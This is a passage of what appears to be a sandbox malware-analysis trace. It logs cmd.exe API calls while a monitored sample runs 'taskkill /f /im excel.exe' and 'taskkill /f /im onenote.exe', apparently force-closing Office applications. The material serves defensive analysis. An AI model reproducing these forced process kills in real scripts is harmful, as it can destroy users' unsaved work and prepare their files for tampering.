lpConsoleTitle=0x502dd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.687] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0060.687] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0060.688] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0060.688] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0060.688] GetProcessHeap () returned 0x4f0000 [0060.688] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x400a) returned 0x506a48 [0060.688] GetProcessHeap () returned 0x4f0000 [0060.688] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506a48 | out: hHeap=0x4f0000) returned 1 [0060.689] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0060.689] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0060.689] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0060.689] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0060.689] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0060.689] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0060.689] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0060.689] GetProcessHeap () returned 0x4f0000 [0060.689] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x58) returned 0x502fe8 [0060.689] GetProcessHeap () returned 0x4f0000 [0060.689] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1a) returned 0x505748 [0060.689] GetProcessHeap () returned 0x4f0000 [0060.689] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x2c) returned 0x503048 [0060.690] GetConsoleTitleW (in: lpConsoleTitle=0x2cf5d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.690] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0060.690] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0060.690] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0060.690] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0060.690] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0060.691] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0060.691] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0060.691] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0060.691] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0060.691] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0060.691] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0060.691] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0060.691] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0060.691] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0060.691] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0060.691] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0060.691] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0060.691] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0060.691] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0060.691] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0060.691] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0060.691] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0060.691] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0060.691] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0060.691] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0060.691] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0060.691] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0060.691] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0060.691] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0060.691] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0060.691] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0060.691] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0060.691] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0060.691] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0060.691] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0060.691] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0060.691] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0060.691] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0060.691] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0060.691] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0060.691] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0060.691] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0060.692] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0060.692] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0060.692] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0060.692] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0060.692] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0060.692] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0060.692] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0060.692] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0060.692] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0060.692] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0060.692] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0060.692] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0060.692] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0060.692] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0060.692] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0060.692] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0060.692] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0060.692] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0060.692] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0060.692] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0060.692] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0060.692] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0060.692] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0060.692] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0060.692] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0060.692] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0060.692] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0060.692] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0060.692] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0060.692] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0060.692] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0060.692] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0060.692] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0060.692] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0060.692] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0060.693] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0060.693] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0060.693] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0060.693] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0060.693] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0060.693] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0060.693] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0060.693] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0060.693] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0060.693] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0060.693] GetProcessHeap () returned 0x4f0000 [0060.693] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x210) returned 0x503080 [0060.693] GetProcessHeap () returned 0x4f0000 [0060.693] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x3e) returned 0x503298 [0060.693] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0060.693] GetProcessHeap () returned 0x4f0000 [0060.693] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x418) returned 0x4f07f0 [0060.694] SetErrorMode (uMode=0x0) returned 0x0 [0060.694] SetErrorMode (uMode=0x1) returned 0x0 [0060.694] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4f07f8, lpFilePart=0x2cf0f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cf0f0*="Desktop") returned 0x25 [0060.694] SetErrorMode (uMode=0x0) returned 0x1 [0060.694] GetProcessHeap () returned 0x4f0000 [0060.694] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x4f07f0, Size=0x66) returned 0x4f07f0 [0060.694] GetProcessHeap () returned 0x4f0000 [0060.694] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x4f07f0) returned 0x66 [0060.694] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0060.694] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0060.694] GetProcessHeap () returned 0x4f0000 [0060.694] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x120) returned 0x5032e0 [0060.694] GetProcessHeap () returned 0x4f0000 [0060.694] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x238) returned 0x4f0860 [0060.700] GetProcessHeap () returned 0x4f0000 [0060.700] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x4f0860, Size=0x122) returned 0x4f0860 [0060.700] GetProcessHeap () returned 0x4f0000 [0060.700] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x4f0860) returned 0x122 [0060.700] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0060.700] GetProcessHeap () returned 0x4f0000 [0060.700] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xe0) returned 0x503408 [0060.700] GetProcessHeap () returned 0x4f0000 [0060.700] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x503408, Size=0x76) returned 0x503408 [0060.700] GetProcessHeap () returned 0x4f0000 [0060.700] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x503408) returned 0x76 [0060.701] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0060.701] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x2cee6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee6c) returned 0xffffffff [0060.701] GetLastError () returned 0x2 [0060.701] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\taskkill", fInfoLevelId=0x1, lpFindFileData=0x2cee6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee6c) returned 0xffffffff [0060.702] GetLastError () returned 0x2 [0060.702] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0060.702] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x2cee6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee6c) returned 0x503488 [0060.702] GetProcessHeap () returned 0x4f0000 [0060.702] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x14) returned 0x5034c8 [0060.702] FindClose (in: hFindFile=0x503488 | out: hFindFile=0x503488) returned 1 [0060.702] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x2cee6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee6c) returned 0xffffffff [0060.702] GetLastError () returned 0x2 [0060.702] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x2cee6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee6c) returned 0x503488 [0060.702] GetProcessHeap () returned 0x4f0000 [0060.702] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x5034c8, Size=0x4) returned 0x5034c8 [0060.702] FindClose (in: hFindFile=0x503488 | out: hFindFile=0x503488) returned 1 [0060.702] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0060.702] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0060.702] GetConsoleTitleW (in: lpConsoleTitle=0x2cf364, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.703] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf1ec, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf2b4 | out: lpAttributeList=0x2cf1ec, lpSize=0x2cf2b4) returned 1 [0060.703] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf1ec, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf2ac, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf1ec, lpPreviousValue=0x0) returned 1 [0060.703] GetStartupInfoW (in: lpStartupInfo=0x2cf1a8 | out: lpStartupInfo=0x2cf1a8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0060.703] GetProcessHeap () returned 0x4f0000 [0060.703] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x18) returned 0x503488 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0060.703] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0060.704] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0060.704] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0060.704] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0060.704] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0060.704] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0060.704] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0060.704] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0060.704] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0060.704] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0060.704] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0060.704] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0060.704] GetProcessHeap () returned 0x4f0000 [0060.704] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x503488 | out: hHeap=0x4f0000) returned 1 [0060.704] GetProcessHeap () returned 0x4f0000 [0060.704] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xa) returned 0x4fff18 [0060.704] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0060.705] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im excel.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2cf248*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im excel.exe", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf294 | out: lpCommandLine="taskkill /f /im excel.exe", lpProcessInformation=0x2cf294*(hProcess=0x78, hThread=0x74, dwProcessId=0x56c, dwThreadId=0x644)) returned 1 [0060.973] CloseHandle (hObject=0x74) returned 1 [0060.974] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0060.974] GetProcessHeap () returned 0x4f0000 [0060.974] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x505f08 | out: hHeap=0x4f0000) returned 1 [0060.974] GetEnvironmentStringsW () returned 0x505f08* [0060.974] GetProcessHeap () returned 0x4f0000 [0060.974] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb36) returned 0x5040c8 [0060.974] FreeEnvironmentStringsW (penv=0x505f08) returned 1 [0060.974] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0071.006] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x2cf188 | out: lpExitCode=0x2cf188*=0x80) returned 1 [0071.006] CloseHandle (hObject=0x78) returned 1 [0071.007] _vsnwprintf (in: _Buffer=0x2cf2d0, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf194 | out: _Buffer="00000080") returned 8 [0071.007] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0071.007] GetProcessHeap () returned 0x4f0000 [0071.007] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5040c8 | out: hHeap=0x4f0000) returned 1 [0071.007] GetEnvironmentStringsW () returned 0x5040c8* [0071.007] GetProcessHeap () returned 0x4f0000 [0071.007] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb5c) returned 0x5095b0 [0071.007] FreeEnvironmentStringsW (penv=0x5040c8) returned 1 [0071.007] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0071.007] GetProcessHeap () returned 0x4f0000 [0071.007] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5095b0 | out: hHeap=0x4f0000) returned 1 [0071.007] GetEnvironmentStringsW () returned 0x5040c8* [0071.007] GetProcessHeap () returned 0x4f0000 [0071.008] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb5c) returned 0x5095b0 [0071.008] FreeEnvironmentStringsW (penv=0x5040c8) returned 1 [0071.008] GetProcessHeap () returned 0x4f0000 [0071.008] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4fff18 | out: hHeap=0x4f0000) returned 1 [0071.008] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf1ec | out: lpAttributeList=0x2cf1ec) [0071.008] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.008] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0071.008] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.008] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0071.008] _get_osfhandle (_FileHandle=0) returned 0x3 [0071.008] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0071.009] SetConsoleInputExeNameW () returned 0x1 [0071.009] GetConsoleOutputCP () returned 0x1b5 [0071.009] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0071.009] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.009] exit (_Code=128) Process: id = "10" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x16f54000" os_pid = "0xbb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im onenote.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 33 os_tid = 0xbb4 [0060.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fce0 | out: lpSystemTimeAsFileTime=0x18fce0*(dwLowDateTime=0x9402e190, dwHighDateTime=0x1d57b18)) [0060.522] GetCurrentProcessId () returned 0xbb0 [0060.522] GetCurrentThreadId () returned 0xbb4 [0060.522] GetTickCount () returned 0x1149982 [0060.522] QueryPerformanceCounter (in: lpPerformanceCount=0x18fcd8 | out: lpPerformanceCount=0x18fcd8*=18074366219) returned 1 [0060.523] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0060.523] __set_app_type (_Type=0x1) [0060.523] __p__fmode () returned 0x74eb31f4 [0060.523] __p__commode () returned 0x74eb31fc [0060.523] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0060.524] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0060.524] GetCurrentThreadId () returned 0xbb4 [0060.524] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbb4) returned 0x60 [0060.524] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0060.524] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0060.524] SetThreadUILanguage (LangId=0x0) returned 0x409 [0060.524] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0060.524] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fc70 | out: phkResult=0x18fc70*=0x0) returned 0x2 [0060.525] VirtualQuery (in: lpAddress=0x18fca7, lpBuffer=0x18fc40, dwLength=0x1c | out: lpBuffer=0x18fc40*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0060.525] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fc40, dwLength=0x1c | out: lpBuffer=0x18fc40*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0060.525] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fc40, dwLength=0x1c | out: lpBuffer=0x18fc40*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0060.525] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fc40, dwLength=0x1c | out: lpBuffer=0x18fc40*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0060.525] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fc40, dwLength=0x1c | out: lpBuffer=0x18fc40*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0060.525] GetConsoleOutputCP () returned 0x1b5 [0060.525] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0060.525] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0060.525] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.525] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0060.525] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.525] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0060.525] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.526] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0060.526] _get_osfhandle (_FileHandle=0) returned 0x3 [0060.526] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0060.526] _get_osfhandle (_FileHandle=0) returned 0x3 [0060.526] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0060.526] GetEnvironmentStringsW () returned 0x5a2040* [0060.526] GetProcessHeap () returned 0x590000 [0060.526] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xaca) returned 0x5a2b18 [0060.526] FreeEnvironmentStringsW (penv=0x5a2040) returned 1 [0060.526] 